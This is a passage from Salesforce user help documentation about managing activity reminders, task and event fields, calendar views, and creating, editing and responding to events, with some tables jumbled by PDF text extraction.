Additionally, if the option Sort reminder window by due date is not set, the reminders display in the following order:

1. The task and event reminder date and time.
2. The task due date or the event start date and time.
3. Ascending alphabetical order by subject.

If Sort reminder window by due date is set, the reminders display in the following order:

1. The task due date or the event start date and time; if the task has no due date, then it displays first.
2. The task and event reminder date and time.
3. Ascending alphabetical order by subject.

Use the table to determine what's shown as the task due date or event start time.

The Due Date or Start time shows:If you specified:Activity Type

The date you selected when creating or editing the task.A due dateTask

The value None.No due date

The date and time you selected when creating or editing the
event.

An event timeEvent

The date you selected and the time set in the Start of day
field in your Personal Information Settings page.

An all day event
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When viewing the reminder window, you can choose to dismiss or snooze one or more reminders.

To dismiss all reminders in the window, click Dismiss All. After you click Dismiss All, the window will display any reminders
that were not previously in the window due to the 100 reminder limit.

To dismiss a reminder:

1. Select one or more reminders.
2. Click Dismiss.

To snooze a reminder:

1. Select one or more reminders.
2. In the drop-down list, select one of the snooze options. The default snooze option is to remind you again in five minutes.
3. Click Snooze.

When Sort reminder window by due date is not selected, if you click Snooze, the time overdue will be based on the
snooze time when the reminder pops up again. If you close the reminder window, it will open again when you’re notified of
the next reminder.

Note:  If your reminder popups fail to display, ensure that your browser is not blocking them.

See Also:
Customizing Activity Reminders

Customizing Activity Reminders
Available in: All Editions except for Database.com

When reminders are enabled for your organization, the default reminder settings are configured to open the reminder window
and play a sound fifteen minutes before an event's start time, or at 8:00 am the day a task is due. To customize the reminder
settings to meet your needs:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Reminders.
• If you clicked My Settings, select Calendar & Reminders > Reminders.

3. Set the reminder’s behavior. See the following table for reference.

DescriptionSetting

If enabled, open the reminder window when a reminder is
due.

Trigger alert when reminder comes due

If enabled, play a reminder sound when a reminder is due.Play a reminder sound
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DescriptionSetting

If enabled, set a reminder on all new events. From the
drop-down list, select how long before the event you want to

By default, set reminder on Events to:

be reminded of the upcoming event. You can disable the
reminder or change the reminder time when editing the event.

If enabled, set a reminder on all new tasks. From the
drop-down list, select what time, on the day the task is due,

By default, set reminder on Tasks to:

you want to be reminded of the task. All tasks, including those
created by workflow, will use this default. You can disable the
reminder or change the reminder time when editing a task.

If enabled, this option will sort reminders by due date first
and then reminder.

Sort reminder window by due date

To test your settings, click Preview Reminder Alert.

Note:  If the preview popup does not display, ensure that you aren't blocking popups.

See Also:
Setting Reminders on Activities

Searching for Activities
Available in: All Editions except Database.com

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

Note: Archived activities are accessible in advanced search and global search only.

See Also:
Viewing Activities
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Activity Fields
The available fields vary according to which Salesforce Edition you have.

An activity has the following fields, listed in alphabetical order. Depending on your page layout and field-level security settings,
some fields may not be visible or editable.

• Task fields

• Event fields

Event Fields
DescriptionField

The default currency for all currency amount fields in the
activity. Amounts display in the activity currency, and are also

Activity Currency

converted to the user's personal currency. Available only for
organizations that use multiple currencies.

Checkbox that specifies whether event lasts all day.All Day Event

Assigned owner of event. By default, the event is assigned to
the creator. To assign the event to another user, enter a user's
name, or select a user with the lookup icon.

On an event detail page or list view, Assigned To denotes
the event creator. However, if you’re an event invitee and you

Assigned To

view a report on Activities with Contacts, Assigned denotes
you as the invitee.

This field is not available in Personal Edition.

Allows you to set up a series of recurring events.Create Recurring Series of Events

User who created the event including creation date and time.
(Read only)

Created By

Planned date of event. You can enter a date, or choose a date
from the calendar that displays when you put your cursor in
the field.

This field appears only if multiday events are disabled.

Date

Text note describing event. This field can hold up to 32KB
of data.

Description

Division to which the activity belongs. This value is
automatically inherited from the related account, lead, case,

Division

or custom object, if any. Otherwise, the activity belongs to the
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DescriptionField

global division. Available only in organizations that use
divisions to segment their data.

The length of a timed event in hours and minutes.

This field appears only if multiday events are disabled.

Duration

The email address of the contact or lead associated with the
event. This field is automatically filled in with the value from
the corresponding contact or lead record.

Email

Planned end date and time of event. You can enter a date, or
choose a date from the calendar that displays when you put

End

your cursor in the field. Additionally, you can add the current
time by clicking the time link next to the field.

This field appears only if multiday events are enabled.

Name of the field that determines what picklist values are
available for the record. Available in Enterprise, Unlimited,
and Developer Edition.

Event Record Type

User who last changed the event, including modification date
and time. (Read only)

Last Modified By

Contact or lead related to the event. You can enter the name

of the person or use  to select the name. If Shared

Name

Activities is enabled, you can relate up to 50 contacts to a
non-recurring event. This field appears only if you have the
“Read” permission for that type of record; users with sharing
access to the record can click it to view more details.

Location of the event.Location

The phone number of the contact or lead associated with the
event. This field is automatically filled in with the value from
the corresponding contact or lead record.

Phone

Indicates whether users other than the event owner can see
the event details when viewing the event owner's calendar.

Private

However, users with the “View All Data” or “Modify All Data”
permission can see private event details in reports and searches,
or when viewing other users' calendars. Exported data files
will always contain private events. Cannot be set for
multi-person events or when adding or modifying an event in
another user's calendar. Private events cannot be associated
with opportunities, accounts, cases, campaigns, contracts,
leads, or contacts.
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DescriptionField

Public
Note:  Prior to Summer ‘13, this field was called
Visible in Self-Service.

Checkbox that specifies whether the completed event is visible
in the Self-Service portal.

Note:  Starting with Spring ’12, the Self-Service
portal isn’t available for new organizations. Existing
organizations continue to have access to the
Self-Service portal.

If Communities is enabled in your organization, specifies
whether the event is visible to external users in communities.
If the event is owned by an external user, that user sees the
event in the community regardless of whether it is marked
Public or not.

This field is not visible by default and must be exposed by an
administrator.

The record that the event is associated with such as an account,
opportunity, or custom object. This only displays if you have

Related To

the “Read” permission for that type of record; users with
sharing access to the record can click it to view more details.
This option is not available when you associate the event with
a lead instead of a contact.

Optional field that allows users invited to an event to enter a
note when they accept or decline the event. This field is not
available in Personal Edition.

Response

Allows you to select up to 1,000 people and resources for the
event. When you search for people or resources to invite to
an event, the Available list displays up to 300 results.

Select Invitees

Picklist that determines how this event appears when another
user views your calendar: busy, out of office, or free time.

Show Time As

Planned start date and time of event. You can enter a date, or
choose a date from the calendar that displays when you put

Start

your cursor in the field. Additionally, you can add the current
time by clicking the time link next to the field.

This field appears only if multiday events are enabled.

Entry describing subject of activity, for example, “Meeting.”
You can enter a subject, or select from a list of previously
defined subjects.

Subject
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DescriptionField

Time of a planned event. You can add the current time by
clicking the time link next to the field.

This field appears only if multiday events are disabled.

Time

Type of the event, for example, Email, Meeting. Each picklist
value can have up to 40 characters.

Type

See Also:
Activity Overview

Task Fields
DescriptionField

Default currency for all currency amount fields in the activity.
Amounts display in the activity currency, and are also

Activity Currency

converted to the user’s personal currency. Available only for
organizations that use multiple currencies.

Assigned owner of task. By default, the task is assigned to the
creator. To assign the task to another user, enter a user’s name,

Assigned To

or select a user with the lookup icon. This field is not available
in Personal Edition. To assign independent copies of a new
task to multiple users, see Creating Group Tasks on page 1064.

Text note describing the task. This field can hold up to 32KB
of data.

Comments

Allows you to set up a series of recurring tasks. Selecting this
checkbox automatically disables the Due Date field because
each task occurrence in a series will have a different due date.

Create Recurring Series of Tasks

User who created the task including creation date and time.
(Read only)

Created By

Division to which the activity belongs. This value is
automatically inherited from the related account, lead, case,

Division

or custom object, if any. Otherwise, the activity belongs to the
global division. Available only in organizations that use
divisions to segment their data.

Date when the task should be completed. You can enter a
date, or choose a date from the calendar that displays when
you put your cursor in the field.

Due Date
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DescriptionField

Email address of the contact or lead associated with the task.
This field is automatically filled in with the value from the
corresponding contact or lead record.

Email

User who last changed the task, including modification date
and time. (Read only)

Last Modified By

Contact or lead related to the task. You can enter the name

of the person or use  to select the name. If you use Shared

Name

Activities, you can relate up to 50 contacts to the task. This
field appears only if you have the “Read” permission for that
type of record; users with sharing access to the record can click
it to view more details.

Phone number of the contact or lead associated with the task.
This field is automatically filled in with the value from the
corresponding contact or lead record.

Phone

Urgency of the task, for example, Low, Medium, or High.
(Picklist selections can be customized by your administrator.)

Priority

Public
Note:  Prior to Summer ‘13, this field was called
Visible in Self-Service.

Checkbox that specifies whether the completed task is visible
in the Self-Service portal.

Note:  Starting with Spring ’12, the Self-Service
portal isn’t available for new organizations. Existing
organizations continue to have access to the
Self-Service portal.

If Communities is enabled in your organization, specifies
whether the task is visible to external users in communities.
If the task is owned by an external user, that user sees the task
in the community regardless of whether it is marked Public
or not.

This field is not visible by default and must be exposed by an
administrator.

Record that the task is associated with such as an account or
opportunity. This field is not available when you associate the

Related To

task with a lead instead of a contact. This field appears only
if you have the “Read” permission for that type of record; users
with sharing access to the record can click it to view more
details.
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DescriptionField

Checkbox that sends an automated email to the task assignee
to notify him or her that the task was assigned. This option
is not available in Personal Edition.

Send Notification Email

Current status of task, for example, Not Started or Completed.
(Picklist selections can be customized by your administrator.)

Status

Subject or short description of the task, for example, “Email
quote to customer.” You can enter a subject, or select from a
picklist of previously defined subjects.

Subject

Name of the field that determines what picklist values are
available for the record. Available in Enterprise, Unlimited,
and Developer Edition.

Task Record Type

Type of task, for example, Email, Meeting. Each picklist value
can have up to 40 characters.

Type

See Also:
Activity Overview

About Archived Activities
Available in: All Editions except Database.com

Salesforce archives activities according to these conditions.

• Events with a due date more than 365 days old

• Closed tasks with a due date greater than 365 days old

• Closed tasks without a due date and created more than 365 days ago

Additional considerations for activity archiving:

• Archiving occurs weekly at approximately 5:00 AM Greenwich Mean Time (GMT) on Saturday.

• Archived activities can be viewed only in export files, printable view, or by clicking View All on the Activity History related
list. You can also view an archived activity if you know the URL for the activity.

• Archived tasks are not included in reports. However, you can report on open or completed tasks.

• Archived activities aren’t copied when you create or refresh a sandbox.

See Also:
Using the Activity History Related List
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WORKING WITH CALENDARS

Viewing Your Calendar
Available in: All Editions except Database.com

• You can access your calendar from the following locations.

◊ Your Home page.

◊ The Calendar shortcut in the sidebar that opens your last used calendar view.

Your Salesforce administrator must enable this shortcut.

◊ The detail page of an event or task, which includes calendar icons at the top.

◊ An activities list view, which includes calendar icons at the top.

• To navigate your calendar, use the calendar icons.

See Also:
Viewing Event Details
About Event Detail Overlays

Using Calendar Icons

Available in: All Editions except Database.com

DescriptionItem

Day view icon.

Week view icon.

Month view icon.

Single-user view icon. Displays a user's calendar, a public calendar, or a resource calendar.

Multi-user view icon. Displays several users' calendars.

Activity list view icon.

Previous arrow. Click to change the view to the previous day, week, or month, as appropriate.

Next arrow. Click to change the view to the next day, week, or month, as appropriate.
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DescriptionItem

Pick a Date icon. Click to open a popup dialog where you can choose a specific date.

Note:

•  identifies tasks and events that are part of a recurring series.
•  identifies events with invitees. Multi-person events aren't available in Personal Edition.

See Also:
Viewing Your Calendar
Tips for Viewing Your Calendar

Tips for Viewing Your Calendar

Available in: All Editions except Database.com

• Reschedule an event by dragging the item on your calendar to a different time. For best results, place your mouse over the

subject line of the event before dragging it. If the item is a recurring event ( ), only the single occurrence that you drag
is changed, not the entire series. Your administrator controls the availability of drag-and-drop calendar editing, which is
available for single-day events only.

• Create an event by double-clicking a time slot and entering the details in an interactive overlay. Your administrator controls
the availability of click-and-create events.

• To change the default range of hours that your calendar displays, change the Start of day and End of day fields on
your personal information page. For example, if your workday typically begins at 8:00 AM and ends at 6:00 PM, changing
Start of day to 8:00 AM and End of day to 6:00 PM causes your daily and weekly calendar views to default to that
range of hours.

• If you sync events from Outlook using Salesforce for Outlook, you may see a banner at the top of your calendar that links
to a list of your unresolved events. These are synced Outlook events that still need to be assigned to Salesforce records.

See Also:
Viewing Your Calendar
Using Calendar Icons
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Using the Calendar Day View
Available in: All Editions except Database.com

When viewing your calendar, click  to open the day view.

In the single user day view, you can:

• See the events scheduled for the specified day.

• See a list of tasks. You can change which tasks you see using the drop-down list.

• Hover your mouse over the subject of an event to see the details of the event in an overlay.

• Hover your mouse over the subject of a task to see the details of the task in an overlay.

Note:  The event detail or task detail overlays are hover popups that show information about the event or task
and allow you to quickly edit or delete the event or task.

The information presented on these overlays is configured by your administrator.

• Click a time such as 9:00 AM to add an event at that time. Alternatively, double-click a time slot to enter the details of
the event in an interactive overlay. Your administrator controls the availability of click-and-create events.

• Reschedule an appointment by dragging an item on your calendar to a different time. For best results, place your mouse

over the subject line of the event before dragging it. If the item is a recurring event ( ), only the single occurrence that
you drag is changed, not the entire series. Your administrator controls the availability of drag-and-drop calendar editing,
which is available for single-day events only.

• Navigate the calendar using the calendar icons.

• Click Today to display the day view for today.

• Click [Change] to switch to the calendar of another user, a public calendar, or a resource calendar.

• Click [Share My Calendar] to set your personal calendar sharing.

• Click Printable View to display the current calendar view in a print-ready format.

In the multi-user day view, you can view the events of multiple users for the specified day.

Note:  An event that spans more than one day (for example, a client meeting from 10 PM Friday to 2 AM Saturday)
always displays on both days in calendar views.

See Also:
Creating Events

1045

Using the Calendar Day ViewManaging Activities, Opportunities, and Products



Using the Calendar Week View
Available in: All Editions except Database.com

When viewing your calendar, click  to open the week view.

In single user week view, you can:

• See the events scheduled for the specified week.

• Hover your mouse over the subject of an event to see the details of the event in an overlay.

• Click the Add Event icon ( ) to add an event on the appropriate day. Alternatively, double-click a time slot to enter the
details of the event in an interactive overlay. Your administrator controls the availability of click-and-create events.

• Click the date—for example, 26 for March 26th—to drill down to the day view for that day.

• Reschedule an appointment by dragging an item on your calendar to a different time. For best results, place your mouse

over the subject line of the event before dragging it. If the item is a recurring event ( ), only the single occurrence that
you drag is changed, not the entire series. Your administrator controls the availability of drag-and-drop calendar editing,
which is available for single-day events only.

• Navigate the calendar using the calendar icons.

• Click This Week to display the week view for the current week.

• Click [Change] to switch to the calendar of another user, a public calendar, or a resource calendar.

• Click [Share My Calendar] to set your personal calendar sharing.

• Click Printable View to display the current calendar view in a print-ready format.

• Select Show Weekends to display Saturday and Sunday.

Tip: On account, contact, and lead list views, click the Open Calendar link at the bottom of the page to display
a weekly view of a calendar underneath the list. Then, you can drag a record from the list to a time slot on the calendar
to quickly create an event associated with the record. Note that your administrator controls the availability of the
Drag-and-Drop Scheduling feature.

In the multi-user week view, you can view the events of multiple users for the specified week. For more information, see Using
Multi-User Calendar Views on page 1049.

Note:  An event that spans more than one day (for example, a client meeting from 10 PM Friday to 2 AM Saturday)
always displays on both days in calendar views.

See Also:
Creating Events
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Using the Calendar Month View
Available in: All Editions except Database.com

When viewing your calendar, click  to open the month view.

In single user month view, you can:

• See the events scheduled for the specified month.

• Hover your mouse over the subject of an event to see the details of the event in an overlay.

• Click the Add Event icon ( ) to add an event on the appropriate day.

• Click the date—for example, 26 for March 26th—to drill down to the day view for that day.

• Click the appropriate Week link to drill down to the week view for that week.

• Navigate the calendar using the calendar icons.

• Click This Month to display the month view for the current month.

• Click [Change] to switch to the calendar of another user, a public calendar, or a resource calendar.

• Click [Share My Calendar] to set your personal calendar sharing.

• Click Printable View to display the current calendar view in a print-ready format.

In the multi-user month view, you can view the events of multiple users for the specified month. For more information, see
Using Multi-User Calendar Views on page 1049.

Note:  An event that spans more than one day (for example, a client meeting from 10 PM Friday to 2 AM Saturday)
always displays on both days in calendar views.

See Also:
Creating Events

About Event Detail Overlays
Available in: All Editions except Database.com

When viewing a calendar, you can hover your mouse over an event to display the event detail overlay. The event detail overlay
is a hover popup that shows information about the event and allows you to quickly edit or delete the event.

The information presented on the event detail overlay is configured by your administrator.
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Depending on the layout of the event detail overlay, you may be able to click on fields on the overlay to see more detail. For
example, if there is a contact associated with the event, and the event detail includes that information, you can click on the
contact name to go to the contact detail page.

See Also:
Using Your Tasks and Calendar on the Home Page

Viewing Other Calendars
Available in: All Editions except Database.com

In a single user calendar view, you can switch to the calendar of another user, a public calendar, or a resource calendar:

1. Click [Change] to open the calendar lookup window.
2. As necessary, search for the desired calendar:

a. Choose either “User Calendars” or “Public Calendars & Resources” from the drop-down list.
b. In the Search field, enter all or part of the appropriate user, public calendar, or resource name.
c. Click Go!.

3. Click the appropriate name to switch to that calendar.

Note:  When viewing a resource calendar, you cannot add a new event. You can add events to resource calendars only
by inviting the resource to an event.

To reset your view to your own calendar, click Back to My Calendar (not available in Personal Edition).

See Also:
Sharing Your Calendar
Creating an Event in a Public or Resource Calendar

Sharing Your Calendar
Available in: All Editions except Database.com

From a calendar day, week, or month view, click Share My Calendar to change how others are allowed to view your calendar.
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Note:  Regardless of whether your organization's sharing settings specify using hierarchies, activities associated with
a record are still visible to users above the activity’s assignee in the role hierarchy.

See Also:
Viewing Your Calendar
Viewing Other Calendars

Printing Your Calendar
Available in: All Editions except Database.com

To print your calendar, click Printable View from any of the calendar views.

On a printable view, you can:

• Click Print This Page to send the printable view to a printer.

• Click the Next arrow ( ) and Previous arrow ( ) to change the displayed date or dates.
• Click Today, This Week, or This Month depending on the view to display the current date or dates.

In addition:

• On day and week views, you can view a list of tasks that can be customized by selecting an option from the drop-down
list.

• On multi-user views, you can select an option from the Sort by drop-down list to customize the display. Select Time to
include all users' events on a single calendar, or select User to display a separate calendar for each user.

See Also:
Viewing Your Calendar

Using Multi-User Calendar Views
Available in: Professional, Enterprise, Unlimited, and Developer Editions

To see several colleagues' calendars all on one page, click .

When viewing multi-user calendars you can:

• Select, edit, and create list views that determine which calendars display. To show a filtered list of items, select a predefined
list from the View drop-down list, or click Create New View to define your own custom views. To edit or delete any view
you created, select it from the View drop-down list and click Edit.
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• See each person's availability. Consult the legend on the page to see which color indicates Busy or Out of Office time. If
someone has multiple events scheduled for a particular time, all of those events display on the calendar. Note that an event
marked as Free in the event details doesn't display in the multi-user calendar view.

• Hover your mouse over a colored bar to see more details about an event.

• Create an event and invite people. Check the boxes next to the people you want to invite and click New Event. Alternatively,
click the Add Event ( ) icon for the appropriate day.

Consider these tips when viewing multi-user calendars.

• Administrators can choose whether event details display..

• Drag-and-drop editing is not available.

• The time range you see is determined by the Start of day and End of day fields on your personal information page.
Events scheduled outside this time range don't display. To see these events, extend your Start of day or End of day
times.

• Multi-user calendar views work differently in the partner portal. For example, partners can only view calendar information
for people in their own company and their channel manager. For more information, download the Partner Portal User
Help.

See Also:
Sharing Your Calendar
Inviting People to an Event

Viewing Event Details
Available in: All Editions except Database.com

Multi-person events not available in: Personal Edition

• Do one of the following to view the event detail page.

◊ In the Calendar section of the Home page, hover your mouse over or click the subject of an event on the Schedule
Meetings subtab.

Only upcoming events display in the Calendar section. Once the event date has passed, the event displays on the Activity
History related list.

◊ From a calendar view, hover your mouse over an event to see the event's details in an event detail overlay.

◊ On the detail page of an associated record, click the subject line of the event from the Open Activities or Activity
History related lists.

• To see all your scheduled events for a specific day, week, or month, use the calendar icons to switch between different
views.

• Display a Chatter feed of updates, comments, and posts about the event.

• For multi-person events (events with invitees), the detail page lists the users that have been invited and whether they have
accepted or declined the event. If you've been invited to the event, click Accept Event or Decline Event to let the organizer
know if you'll be attending. These buttons appear for invitees only (not organizers).
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You can clone a multi-person event from the event detail page. This lets you quickly create another event with the same
invitees. However, you can't clone standard or recurring events.

•  identifies events that are part of a recurring series. To view the details of the individual event occurrence, select the View
Event subtab, located above the task details. To view the details of the entire event series, select the View Series subtab .

Note:  If the organizer changes the start or end time of an individual event within a recurring series of events, the
calendar view and the Calendar section of the Home page show you the updated time. However, the detail view
of the updated individual event continues to show you the original time until you accept or decline the series.

See Also:
Activity Fields

Creating Events
Available in: All Editions except Database.com

User Permissions Needed

“Edit Events”To create events:

1. In the Calendar section of the Home page, click New Event.
2. Enter the event details.

Note:  If multiday events are enabled for your organization, you can create events that last up to 14 days.

3. Enter the name of the contact or lead related to the event in Name or click  to open the Select Contacts dialog box. If
you use Shared Activities, you can relate up to 50 contacts to the event. In the Select Contacts dialog box, type a name in

Search, and click Find. Use  and  to select and deselect names. Use Make Primary to select a primary contact.
Click Done.

4. To invite the related contacts or lead to the event, click Add to Invitees. The contacts or lead are added to the calendar
in the Select Invitees section.

5. If Spell Checker is enabled for your organization, click Check Spelling to spell-check the contents of the Description
field. Spell Checker does not support all the languages that Salesforce supports. For example, Spell Checker doesn’t support
Thai, Russian, and double-byte languages, such as Japanese, Korean, or Chinese.

6. For non-Shared Activities events, you can create a recurring event. You can't follow recurring events and tasks in Chatter,
nor individual instances of recurring events and tasks. Changes to an individual event or task in a recurring series or to the
series itself won't show up in your Chatter feed.

• Select Create Recurring Series of Events.
• Select the frequency of recurrence.
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Note:  Depending on the type of series you are creating, the maximum number of occurrences is as follows:

◊ Daily: 100
◊ Weekly: 53
◊ Monthly: 60
◊ Yearly: 10

• Set the start date and end date. Click Calculate max end date to automatically set the maximum end date allowed
based on the frequency you selected.

Note:  No occurrence in a series of recurring events can last longer than 24 hours. Once the recurring event is
created, you can extend the length of individual occurrences beyond 24 hours, if multiday events are enabled.

7. To set a reminder for the event, select Reminder and choose how long before the event you want to be reminded. The
reminder applies to each occurrence in the event series.

8. To attach files, click Attach File on the Attachments related list. If you don't see this related list, ask your administrator
to add it to the event detail page layout. For recurring events, the attachment is added to the series of events. Each occurrence
of the recurring event can also have its own unique set of attachments. Attachments to an activity display on the activity
detail page but not on the related contact detail page. This applies to Shared Activities and non-Shared Activities.

9. To invite up to 1,000 users, contacts, leads, or resources, in the Select Invitees section, click Select. When you search for
people or resources to invite to an event, the Available list displays up to 300 results.

10. Click Save. Alternatively, click Save & New Task to save the event and create a new task or Save & New Event to save
and create an additional event.

See Also:
Inviting People to an Event
Creating Recurring Events

Inviting People to an Event
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Events”To invite people to an event:

You can invite users, contacts, leads, or resources to an event.  identifies an event with one or more invitees.

1. In the Select Invitees section on the Event detail page, click Select.
2. In the Select Invitees dialog box, search for the type of invitee: users, leads, contacts, or resources.

Person accounts are returned in contact searches and can be added as invitees.

3. Enter a name or part of a name, or leave the field blank to expand the search, and click Find.
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4. Use  and  to select and deselect people or resources.

To invite more people or resources, search again and select the invitees you want. When you search for people or resources
to invite to an event, the Available list displays up to 300 results.

Note:

• Events that occur only once can have a maximum of 1,000 invitees and resources.
• Recurring events can have a maximum of 100 invitees and resources.
• You must have at least read access to the contacts and leads you invite to an event. You must have at least

“Add Events” on a resource to invite it to an event.

5. Click Done.
6. Review the calendar of each invitee and adjust the date and time of the event, if necessary.

The availability of invitees is indicated in color on their calendars: busy time is blue and out-of-office time is red. If an
invitee has more than one event scheduled for a particular time, all the events are shown on the calendar. Hover your mouse
over any event on the calendar to see the event details.

Note:  Events marked as free are not displayed.

7. To remove an invitee from an event, click Remove next to the invitee’s name.
8. Click Save & Send Update.

Invited leads, contacts, and person accounts receive an email containing a link to a web page where they can accept or
decline the invitation for the event or event series. You will also receive an email summary of the event. If an invited resource
is available at the given time, it will automatically accept the invitation. You can't double-book resources.

See Also:
Responding to Events
Editing Multi-Person Events

Creating an Event in a Public or Resource Calendar
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Events”To create an event in a public or resource calendar:

Adding Events to Public Calendars

To add an event to a public calendar:

1. On a calendar view, click [Change] to switch to the appropriate public calendar.
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2. Choose the appropriate time and date of the new event:

• On the day view, click a time such as 9:00 AM to add an event at that time.
• On the week or month view, click the Add Event icon ( ) to add an event on a particular date.

3. Enter the details of your event. For details, see Creating Events on page 1051.
4. Click Save. Alternatively, click Save & New Task to save the event and immediately begin creating a new task or Save &

New Event to save and begin creating an additional event.

Adding Events to Resource Calendars

To add an event to a resource calendar, invite the resource to the event. For details, see Inviting People to an Event on page
1052.

See Also:
Managing Public and Resource Calendars

Editing Events
Available in: All Editions except Database.com

User Permissions Needed

“Edit Events”To edit events:

1. Review the following considerations about who can edit events.

• Permission to edit other users’ events is controlled by your organization's calendar sharing model and your personal
calendar sharing. However, regardless of these settings, managers in the role hierarchy can always edit the events of
people who report to them.

• Private events can be edited only by the event owner (the user assigned to the event) and users with the “Modify All
Data” permission.

2. Open the event edit page.

• On the Home page, click the subject of an event listed in the Calendar section, and then click Edit Event. Alternatively,
hover your mouse over the subject of an event to display the details of the event in an overlay, and then click Edit.

• On a calendar view, click the subject of an event, and then click Edit Event. Alternatively, hover your mouse over an
event to see the event's details, and then click Edit.

• On single user daily and weekly calendar views:

◊ Reschedule an event by dragging the item on your calendar to a different time. For best results, place your mouse

over the subject line of the event before dragging it. If the item is a recurring event ( ), only the single occurrence
that you drag is changed, not the entire series. Your administrator controls the availability of drag-and-drop calendar
editing, which is available for single-day events only.

◊ Create an event by double-clicking a time slot and entering the details in an interactive overlay. Your administrator
controls the availability of click-and-create events.

1054

Editing EventsTracking Tasks, Events, and Meetings



• On the Open Activities or Activity History related list of an associated record, click Edit next to the appropriate event.
• On an activities list view, click Edit next to the appropriate event.

3. Change the event fields.

4. Enter the name of the contact or lead related to the event in Name or click  to open the Select Contacts dialog box. If
you use Shared Activities, you can relate up to 50 contacts to the event. In the Select Contacts dialog box, type a name in

Search, and click Find. Use  and  to select and deselect names. Use Make Primary to select a primary contact.
Click Done.

5. To invite the related contacts or lead to the event, click Add to Invitees. The contacts or lead are added to the calendar
in the Select Invitees section.

6. If Spell Checker is enabled for your organization, click Check Spelling to spell-check the contents of the Description
field. Spell Checker does not support all the languages that Salesforce supports. For example, Spell Checker doesn’t support
Thai, Russian, and double-byte languages, such as Japanese, Korean, or Chinese.

7. To set a reminder for the event, select Reminder and choose how long before the event you want to be reminded. The
reminder applies to each occurrence in the event series.

8. To attach files, click Attach File on the Attachments related list. If you don't see this related list, ask your administrator
to add it to the event detail page layout. For recurring events, the attachment is added to the series of events. Each occurrence
of the recurring event can also have its own unique set of attachments. Attachments to an activity display on the activity
detail page but not on the related contact detail page. This applies to Shared Activities and non-Shared Activities.

9. To change the event invitees, click Select in the Select Invitees section.
10. Click Save.

See Also:
Editing Multi-Person Events
Editing Recurring Events
Editing an Event in a Public or Resource Calendar

Editing Multi-Person Events
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Events”To edit multi-person events:

 identifies a multi-person event. You can change the details of a multi-person event that you own.

1. Open the event detail page and click Edit.
2. Change the event details and invitees.
3. From Email Option in the Select Invitees section, choose whether to send an email update to all invited users or only the

users you added or deleted during editing.
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4. Click Save & Send Update to save the event and send an update email to the invitees. Alternatively, click Save to save
your changes without sending an email. All changes will be reflected on the calendars of invited users.

Note:  You can edit a multi-person event only if you are the event owner. As the event owner, you don't receive an
email when an invitee accepts or declines an invitation.

You can reassign a multi-person event to a new owner if the event isn’t part of a recurring event series.

See Also:
Editing Recurring Events
Editing Events

Editing Recurring Events
Available in: All Editions except Database.com

User Permissions Needed

“Edit Events”To edit recurring events:

Note:  In Chatter, you can’t follow series or individual occurrences of recurring events or tasks. Changes to a series
or to an individual event or task in a series don’t show up in your Chatter feed.

Change the Details of a Single Event in a Series

1. Select an event from the calendar on the Home tab or from the Open Activities or Activity History related list of a record,
and then click the View Event subtab. Alternatively, hover over the event in any calendar and click Edit.

2. Click Edit Event.
3. Change the fields for this event.

Note:  If you change a field in a single event, and then you change the same field in the series, the change in the
series overrides the change to the single event.

4. If people have been invited to the event, and you want to email them updates, choose one of the following options from
the drop-down list in the Select Invitees section. Then click Save & Send Update:

• To update all invitees’ calendars and email an update to everyone, choose Send updates to all invitees.
• To update all invitees’ calendars and email an update only to invitees you’ve added or removed, choose Send updates

only to added or deleted invitees.

5. If you don’t want to email updates to anyone, click Save.

Change the Details of All Future Events in a Series

1. Select an event from the calendar on the Home tab or from the Open Activities or Activity History related list of a record.
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2. Select the View Series subtab and then click the Edit Series button. Alternatively, on the event detail page, in the Recurrence
section, click the Edit Series link.

3. Change the fields for this series of events. Changes you make to a series don’t affect past events.

Warning:  Changes you make to any fields in an event series override changes previously made to single events.

In addition, if you change any of the following settings, the status of invitees for all future events will be reset to
Not Responded; you’ll lose messages sent with invitees’ responses and other changes to single future events; triggers
and workflows will be reset; and links to future events will break:

• All-day event checkbox
• Start or end time
• Location
• Recurrence frequency
• Recurrence start or end date, if you send updates to invitees

If you don’t send updates, and you only extend the recurrence end date, then future events are not affected.

4. If people have been invited to the event, and you want to email them updates, choose one of the following options from
the drop-down list in the Select Invitees section. Then click Save & Send Update:

• To update all invitees’ calendars and email an update to everyone, choose Send updates to all invitees.
• To update all invitees’ calendars and email an update only to invitees you’ve added or removed, choose Send updates

only to added or deleted invitees.

5. If you don’t want to email updates to anyone, click Save.

See Also:
Editing Multi-Person Events
Editing Events

Editing an Event in a Public or Resource Calendar
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit Events”To edit an event in a public or resource calendar:

Note:  Permission to edit events in public and resource calendars is controlled by the calendar sharing model.

1. On a calendar view, click [Change] to switch to the appropriate public calendar.
2. Open the event edit page.
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• On the Home page, click the subject of an event listed in the Calendar section, and then click Edit Event. Alternatively,
hover your mouse over the subject of an event to display the details of the event in an overlay, and then click Edit.

• On a calendar view, click the subject of an event, and then click Edit Event. Alternatively, hover your mouse over an
event to see the event's details, and then click Edit.

• On single user daily and weekly calendar views:

◊ Reschedule an event by dragging the item on your calendar to a different time. For best results, place your mouse

over the subject line of the event before dragging it. If the item is a recurring event ( ), only the single occurrence
that you drag is changed, not the entire series. Your administrator controls the availability of drag-and-drop calendar
editing, which is available for single-day events only.

◊ Create an event by double-clicking a time slot and entering the details in an interactive overlay. Your administrator
controls the availability of click-and-create events.

• On the Open Activities or Activity History related list of an associated record, click Edit next to the appropriate event.
• On an activities list view, click Edit next to the appropriate event.

3. Change the event fields as needed.
4. Click Save.

See Also:
Managing Public and Resource Calendars

Responding to Events
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

When another user invites you to an event, you receive an email containing a link to the event. The event also displays on your
Home tab if your home page layout includes your calendar. To accept or decline the event:

1. Click the event description.
2. Optionally, enter a response.
3. If the event is a single event, click Accept Meeting or Decline Meeting. If you have been invited to a series of events,

click Accept Series or Decline Series.

Note:  If you want to attend some of the events in a series of events, but want to decline other events in the series,
accept the series and then decline the specific events you will not attend.

